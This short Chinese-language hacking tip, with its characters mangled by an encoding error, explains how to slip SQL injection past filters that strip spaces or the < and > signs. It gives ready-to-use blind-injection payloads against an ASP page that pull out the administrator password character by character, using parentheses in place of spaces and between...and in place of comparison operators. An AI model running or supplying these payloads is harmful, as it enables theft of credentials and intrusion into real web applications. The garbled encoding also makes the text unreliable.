對(duì)于SQL語(yǔ)句,大家還都習(xí)慣于其的空格,比如select id from [name],如果中間沒(méi)有了空格,那就成了selectidfrom[name], 一灘糊涂!除了上面所說(shuō)到幾個(gè)空格的替代方法外,我發(fā)現(xiàn)用()括號(hào)在SQL中一樣可以運(yùn)行,比如上面的語(yǔ)句,就可以寫成,select(id)from[name],有括號(hào)分隔,可以正常執(zhí)行。 舉個(gè)例 子說(shuō)一下,我們得到一個(gè)注入點(diǎn):jmdcw.asp?name=aa'and 1=1 and ''=',如果替換其中的1=1為查詢管理員的密碼的語(yǔ)句:(select asc(mid(pass,1,1)) from [name] where id=1)>49。如何用空格呢?其實(shí)可以寫成這樣的: jmdcw.asp?name=aa'and((select(asc(mid(pass,1,1)))from[name]where(id=1))>49)and''=' 如果屏蔽了<和>符號(hào),則用between…and…,語(yǔ)句是: jmdcw.asp?name=aa'and((select(asc(mid(pass,1,1)))from[name]where(id=1))between(40)and(50))and''='
